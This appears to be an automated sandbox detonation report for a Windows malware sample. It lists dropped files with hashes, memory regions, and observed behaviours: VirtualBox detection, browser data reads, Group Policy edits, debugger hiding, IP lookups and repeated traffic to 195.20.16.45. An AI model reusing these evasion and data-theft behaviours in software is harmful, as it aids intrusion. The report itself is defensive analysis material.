| MD5 | 3d2fd432d83034d3f60f4353943ba959 |
| SHA1 | aaa51821a12eec15e704c4a1827ae3cdc401ad92 |
| SHA256 | 7ee27efcbf77620cb30881e9360937d55e4d76e5963d94f898d818a1cac5ae06 |
| SHA512 | a1b923df19ef86ce6d961b1b41222bbb54aee18a2c2ccb61c7a617091f1a4ba51b3fef46315455ec89c0ded917adb18f76f1815d53fb7a766434f7660e81ac1a |
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe
| MD5 | ccba907ff137d72e46c20fa3d523c777 |
| SHA1 | fbef73ed53f836d4a6f3619b7033237c9a88bebb |
| SHA256 | 3cf41c34268b626c913a0db4317871eac685cfac493d3b7a641315d67bb5acf4 |
| SHA512 | 037df2c6628026451df2e20346c8009b1a1ff77bb3e915b509c86b94d3e70dd6a8bf98607acba1c123abb99e36781eafadc1b7f6d7e82830c7f7ffd2558a7e19 |
memory/708-1350-0x00000000737C0000-0x0000000073EAE000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | 747ef608e6ecc1ea01054099357c5993 |
| SHA1 | daa0d8b324afd5e7c33ce9dc72006f5247d63281 |
| SHA256 | 4f0cf780e5037f6ad8a3ba213315302501203dca03f8ab28f56c67dbc8b40ed9 |
| SHA512 | 858b757b7032181012cd9a945e53d1274a68b01d2f260a64616b355ec9cf7bc13ce1a629be4e952d42a6e44f48ffcacbc6a3a2ca0ddd9c4e4d042a744f43c7ef |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2b8c4d6e9733c38f34eb72ce17bc8236 |
| SHA1 | 4904f60367d53607c6938aa4b2042fb06a5f718f |
| SHA256 | 9e8588c5897282c21c172b23b717b3f2bb705d24552d167cc9dffa2615a839ea |
| SHA512 | e7f42bc47bdc1e3b8bfd4dcbf2516e2ec1da56ab3eaa3b7de9b99a21d7377c8f1719fb69ef4a668dd93d025cdcbb0483debbfa3f451a10c5df0935e8b5f6cff5 |
memory/1872-1431-0x0000000000990000-0x0000000000991000-memory.dmp
memory/2220-1436-0x0000000002F25000-0x0000000002F3D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2BF.exe
| MD5 | b12a32d3450c2cd7aae7f9af384b4cac |
| SHA1 | 973641854c881465136f275283c9642f8bad62d5 |
| SHA256 | 388ef1a3c7b241d0583503e836918a2a316d8e4a733fed3ab39c838d73cf91b4 |
| SHA512 | fc6510b724f6af1994c3ef8549dd178a2e986c816a88d4ee6f7ff0d2bb94e3f3b144e547994635a764b43f0127e8bb11dbcd00d26aad6d12a6378626bc2f77c3 |
memory/2220-1448-0x0000000000400000-0x0000000002D38000-memory.dmp
memory/1872-1454-0x0000000000CD0000-0x000000000126B000-memory.dmp
memory/3684-1463-0x00000000046F0000-0x00000000048A8000-memory.dmp
memory/3684-1465-0x00000000048B0000-0x0000000004A67000-memory.dmp
memory/1872-1464-0x0000000002A60000-0x0000000002A61000-memory.dmp
memory/1872-1475-0x0000000002BE0000-0x0000000002BE1000-memory.dmp
memory/1872-1480-0x00000000026C0000-0x00000000026C1000-memory.dmp
memory/1872-1485-0x0000000002BF0000-0x0000000002BF1000-memory.dmp
memory/1872-1484-0x0000000002C00000-0x0000000002C02000-memory.dmp
memory/1872-1481-0x0000000000980000-0x0000000000982000-memory.dmp
memory/1872-1479-0x0000000002B90000-0x0000000002B91000-memory.dmp
memory/1872-1478-0x0000000002A80000-0x0000000002A81000-memory.dmp
memory/1872-1474-0x0000000002910000-0x0000000002911000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 63e438954d654f3546d0f463cd305b6d |
| SHA1 | 76cc4b7b51d42ef38201b9cfd88629cbe6447579 |
| SHA256 | 2b620be240c3c5f0a3fa8762352975392be2a83f3e08e63a55ad41775cb0bade |
| SHA512 | b92dc9ae54097bde1d2162ffdf2c129c0ab778293e72a07429a3220af224244d9db65dda20ab8a1c0e534e9d478c30b41d2004fbbbb651e9617ac787b6ef41b8 |
memory/2324-1576-0x000007FEF2640000-0x000007FEF2FDD000-memory.dmp
memory/2324-1577-0x0000000002F20000-0x0000000002FA0000-memory.dmp
memory/2788-1579-0x0000000004CB0000-0x00000000050A8000-memory.dmp
memory/1828-1578-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/2352-1580-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CY2G78MW\3m4lyvbs6efg8pyhv7kupo6dh[1].ico
| MD5 | 3d0e5c05903cec0bc8e3fe0cda552745 |
| SHA1 | 1b513503c65572f0787a14cc71018bd34f11b661 |
| SHA256 | 42a498dc5f62d81801f8e753fc9a50af5bc1aabda8ab8b2960dce48211d7c023 |
| SHA512 | 3d95663ac130116961f53cdca380ffc34e4814c52f801df59629ec999db79661b1d1f8b2e35d90f1a5f68ce22cc07e03f8069bd6e593c7614f7a8b0b0c09fa9e |
memory/2788-1595-0x0000000000400000-0x0000000003118000-memory.dmp
memory/1384-1596-0x0000000000550000-0x0000000000B38000-memory.dmp
memory/1384-1597-0x0000000000760000-0x0000000000D48000-memory.dmp
memory/1872-1598-0x00000000026D0000-0x00000000026D1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6ef95c0c-c5eb-477e-a91d-9cde8a286652.tmp
| MD5 | 296ec7e1734c2f224204c949ccd335d2 |
| SHA1 | 3294e35c80af3c892767512cbaa7736460c28952 |
| SHA256 | d8c4c69cfb9e4cd0b2878dc2a48cc72d54cf73e8f64a4d3c0ad66a109a6abe0f |
| SHA512 | 80ac4f585371bfee01f81673b5d40d6be19fb2264449222aef2dad6a2c72ffd02824492851cd81c0fdde44d03edc4c150c8800ad7b70eed5e2855f6f7ef56e15 |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | 7b7b64e21cc3c8295ade9914b4140ded |
| SHA1 | 6a96c39af69268d25c60aeeedb15d1e100de6119 |
| SHA256 | 1afa729189008fae921e27e07cf92b2d87b22558e93684141092ec98c3a62c90 |
| SHA512 | 2890019a01665020f9c28a799d0a2f7bd35c0798120598bbdb01d4bf63a4a323abb04d576cb46436d8fe491b719c2e4ae574ac0d74be2f43a07b0d32dcc36e55 |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe
| MD5 | 9167418153667b5984b64729e2cc304c |
| SHA1 | af391e07bdd8592a06fa13077f2fdeb6a564bdc0 |
| SHA256 | b59d22ae79f79061d50ee7461c9e146bb4df6a048ec9deebd267944237206961 |
| SHA512 | 1909ff300fbb006fdedf87729791909d75225ef68a62fd5dcb8a0d525b8102cedd4ec86a8b268aaf10e577e6d525928539b1668acb2758d8d0a93f16480e76f4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_520FA7AD0A5B7A5300910F5BBDCB6D0C
| MD5 | 512484c864f03d942b375be914f0e87a |
| SHA1 | 22d5f6f2a2f75c2824ebe531bb4469820f4e412f |
| SHA256 | 7007095b23b512a2d22c0c3464521d4c04a216bb1adfd2d710d1b1325e44563e |
| SHA512 | fbd34a47c65ed8781073c404dac037be619fc057e8fd9c41d5fe2173241188ceef6d3fb1422406ffa0665dd33f2465cc5ea7bd9f6d61f2974df452dca9bf2a11 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\O4ZUVKGE\accounts.google[1].xml
| MD5 | c1ddea3ef6bbef3e7060a1a9ad89e4c5 |
| SHA1 | 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966 |
| SHA256 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db |
| SHA512 | 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30BCF8D79B1225AC4F40686E58D30D95
| MD5 | 3a9e9078c23e745b6b3adeda8bf007d6 |
| SHA1 | 73efef6de1ae81ad90f1f313aec7a51b6a793d99 |
| SHA256 | a5719da1dcac5ffae8d52cbeb79fa95e4da62746c111eeb833250a5e04a6f328 |
| SHA512 | a52b200ca23fc077b9870b03aadb0845012a0206a8243b00d040e1f407941a3952b0671b31c97e5f733c9a19df2b79f733235d9d48b35382e6e06414fa6d4c72 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30BCF8D79B1225AC4F40686E58D30D95
| MD5 | f40ed113228750cfd7a589e9d717c518 |
| SHA1 | 14a57aadde10d2d7d8ca590a6c1fb04886897693 |
| SHA256 | 94615d8606f3e16679d03700a02ced8b7ea8c2b453da9b7bea855cbe229d395a |
| SHA512 | a20e48dd8b432da446be22a6f675574fab2f321ce11690fe75312795a62dd832c4652633d8547c6eee1743687f706ba0a464f56239c09882c8af171fd3869bbd |
C:\Users\Admin\AppData\Local\Temp\Kno226F.tmp
| MD5 | 002d5646771d31d1e7c57990cc020150 |
| SHA1 | a28ec731f9106c252f313cca349a68ef94ee3de9 |
| SHA256 | 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f |
| SHA512 | 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\jw2rl61\imagestore.dat
| MD5 | 04ea2732aeca95131a59c207c8426617 |
| SHA1 | facee4d396551c97c1fb53925902f8d7a97a283a |
| SHA256 | c99d2ddd041314957c575a9be8fb544b1bb821e0222dbd2728488a1d52cec31f |
| SHA512 | 6bab4e91326ce9a1eb1e26dcf675553c74d2b1de0fd953148c4fb330e72a24ce63bd99aab2fa9000052beab28d6f8bbbb641970514668e2ac9da3b8f59d68cc1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RSAB58HZ\favicon[1].ico
| MD5 | f3418a443e7d841097c714d69ec4bcb8 |
| SHA1 | 49263695f6b0cdd72f45cf1b775e660fdc36c606 |
| SHA256 | 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770 |
| SHA512 | 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563 |
C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
| MD5 | da597791be3b6e732f0bc8b20e38ee62 |
| SHA1 | 1125c45d285c360542027d7554a5c442288974de |
| SHA256 | 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07 |
| SHA512 | d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp
| MD5 | b3ac3cbe864fd6a9b834580173b47cd5 |
| SHA1 | 9efaf52ea87825877a4e9cf4bf6e0f75436f8632 |
| SHA256 | 42948b3d788a51acbfc4b588027b2ad4e97f150f772c576fc99f51b852a6b476 |
| SHA512 | 4a8ea2d1ea425227765600438db8485a484ffd6781b636c67662babe0d709f67e1b6cf7c576e749e188646338769ec9adb3ddf96ff5282021adf9a2c412cdd3c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\4Kv5U5b1o3f[1].png
| MD5 | a81a5e7f71ae4153e6f888f1c92e5e11 |
| SHA1 | 39c3945c30abff65b372a7d8c691178ae9d9eee0 |
| SHA256 | 2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e |
| SHA512 | 1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
| MD5 | 1f6dc80ce5a84ef17e9779794b7df6e8 |
| SHA1 | 5bb4d57eceb0088339010522d0085923b994a2f4 |
| SHA256 | 403b6799de69adfc12508f5076adebb0bd3d8a61104550b1bcbd339ca63b8df2 |
| SHA512 | 5adfaf13c99bd71ebca26e4f3da9ec03587be69bfe3b7487817640e3259b2b354f96786370e8419577ef5eb6a3a12c623345c98f8969e43cd8f0496d1b437d23 |
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe
| MD5 | 6521303e3666ae8ed8da817141810cc1 |
| SHA1 | 7369d9bb8d156ea2a6ee134b7cd547913309806b |
| SHA256 | 7595acad6784cd13d6bd3fa41bf3087d66313ca9be5e1eab48f429c81ce5c2f1 |
| SHA512 | f4b58df7e5718053558fb848e0ae4d4a43468b71d929e4a856620170589cc9f55ffda257db2869fe2e7603d51a87516840654a96bfb84d2630188cd9c608d94d |
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
| MD5 | 92f9cb175991f582b8dfd0c5e3996110 |
| SHA1 | 062df1e5e55706f4a99ab275a0e5ffc227356296 |
| SHA256 | 7192a1241a20e08be3b1746bb93b5e2638e1beb748736c4d30c12d6b7d47a287 |
| SHA512 | 4637a6faba71dd4a2f69c9acb77a64665e748d17d6933b7dd1be3db2eb862adc08a34415651ae0f93c37ad110322c0cb89f304f8310f704ef344b916ceb8b554 |
C:\Users\Admin\AppData\Local\Temp\CF74.exe
| MD5 | fa8e35d22c98e53b6366ebaeec28b6b6 |
| SHA1 | 088e3ad63c39188ff30f8a3c2541293aa1d06df6 |
| SHA256 | 2d68f91830a905f55f61d37e69cf925fb85396aa6fa4f5083e117f80a26efd57 |
| SHA512 | 7b911df0087e51fb9f951d544e783e17bc193a4321466cd4d1b298416d2ba46dde457a6d5f75f586f3b4d645203960d9569235509b8207bcced6af803632dac4 |
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
| MD5 | b03886cb64c04b828b6ec1b2487df4a4 |
| SHA1 | a7b9a99950429611931664950932f0e5525294a4 |
| SHA256 | 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc |
| SHA512 | 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a89283832c07b98503d67fd3dfbf5166 |
| SHA1 | 0e0025129052d951f61564496328f75f11e85249 |
| SHA256 | 96d3c721915b0daa3d55ec2e85e32f7bd0453077d1344606015a6043d4136ea7 |
| SHA512 | 01e649ec84a3ff7f87e6de62e261bd544a410fd8dcbb208bc963fc42235a03229bb619734f31309900b5f24c7242d28803a3e43212397d40a78d014361acb0df |
C:\Users\Admin\AppData\Local\Temp\nsoCE67.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp
| MD5 | 8ff53e80a706a7318fbea374d10d45a1 |
| SHA1 | 3090f1b2c4e2925ec4c40e9c075c0e26b0e062d7 |
| SHA256 | a8ebc01ef33871d316ab99d917b940e8745c132a05e39ab117ca4b50583d24b4 |
| SHA512 | f1f597aae7f571307068b41d520ed0cf5beace1f2023fa1d5c2211a2eb28c88a059e3d17b1cfeae799cf843abf7adb83e7000bd9b336098b1b9e3caa6170f4a9 |
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
C:\Users\Admin\AppData\Local\Info Tool Extension\is-QQQ64.tmp
| MD5 | 6231b452e676ade27ca0ceb3a3cf874a |
| SHA1 | f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1 |
| SHA256 | 9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf |
| SHA512 | f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\nss3[1].dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\VSO Inspector\is-SJ36R.tmp
| MD5 | 7c4c4a4d5684e8aacdc6b118a601a7bb |
| SHA1 | 64c8cc24339d73909916e303ab08a253dd49fe3f |
| SHA256 | d20e213ef79f5f58cf6ca45812648e21612af6b82f52eeee044ea050ab32d75e |
| SHA512 | db34326a59c7e5e809de1da9c98d5464d753dd554e9c8dddc32f164bfe9d637a5d5c6ae093905b8ca075b6801fd0d53e34e6400c7f9e1d553e33618a9baadeea |
C:\Users\Admin\AppData\Local\VSO Inspector\is-9PEDE.tmp
| MD5 | 9652fd87be092d9a50ef0156e00f8f8e |
| SHA1 | 006ab84afbd111eb8771276120a784c7a935e6c3 |
| SHA256 | 456c82b7f6e36fe13fdd385579049c426b2fa1307b0180aa0496ca75d522324c |
| SHA512 | 5d7b963b0929c00a64a83c2ff235cafa4a98b45082d48ed2d0cf94cb4cd09fdfd0e94deae31ef85ed48bbf7660a39da71f97ed9124233bf448a2b2a76ea5c5d6 |
C:\Users\Admin\AppData\Local\Temp\305.exe
| MD5 | 1996a23c7c764a77ccacf5808fec23b0 |
| SHA1 | 5a7141b167056bf8f01c067ebe12ed4ccc608dc7 |
| SHA256 | e40c8e14e8cb8a0667026a35e6e281c7a8a02bdf7bc39b53cfe0605e29372888 |
| SHA512 | 430c8b43c2cbb937d2528fa79c754be1a1b80c95c45c49dba323e3fe6097a7505fc437ddafab54b21d00fba9300b5fa36555535a6fa2eb656b5aa45ccf942e23 |
C:\ProgramData\EditPush.txt
| MD5 | a80739e8d257b131e2fb990d3a09bf4e |
| SHA1 | 3f2452672c160bb3eccfba3d612cfe95cfc64212 |
| SHA256 | b4449d67334535ca485a0245a341d6b9ce3315974bae7f6628aeaa78e14e4583 |
| SHA512 | 9018a7e7dda66e4f59f42b7f260bd35a2f2165500abaff3cf2c99a40740c2ac4999b401aa1514a34d8dcaf91fa146f57d2de6342cc5036700544513e06a7ad63 |
C:\ProgramData\UndoSync.docx
| MD5 | 2f04bfc62820734c1465af727c3f81d8 |
| SHA1 | b1de4ecafb64e259a0170f7ff418811629f08def |
| SHA256 | d19f86b2d8656cf474f844476822ce8059ec41f29e7c6c9fa0fdb8ef1f7fe84b |
| SHA512 | eddb3fbf823af8de9959090ebeaeb6d309d244ad494c71c9a9c657accdb6f96abcea1529689e79f8dfad0d755f9c62346f914f92cdd0c62ec363ce49d8ad549e |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win10v2004-20240221-en
Max time kernel
141s
Max time network
157s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3054445511-921769590-4013668107-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 59.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
memory/2176-0-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-1-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-2-0x00007FFD80000000-0x00007FFD80002000-memory.dmp
memory/2176-3-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-4-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-5-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-7-0x00007FFD80030000-0x00007FFD80031000-memory.dmp
memory/2176-6-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp
memory/2176-8-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-9-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-10-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-11-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-12-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/2176-20-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-21-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-22-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-23-0x00007FFD80000000-0x00007FFD80002000-memory.dmp
memory/2176-24-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-25-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-26-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp
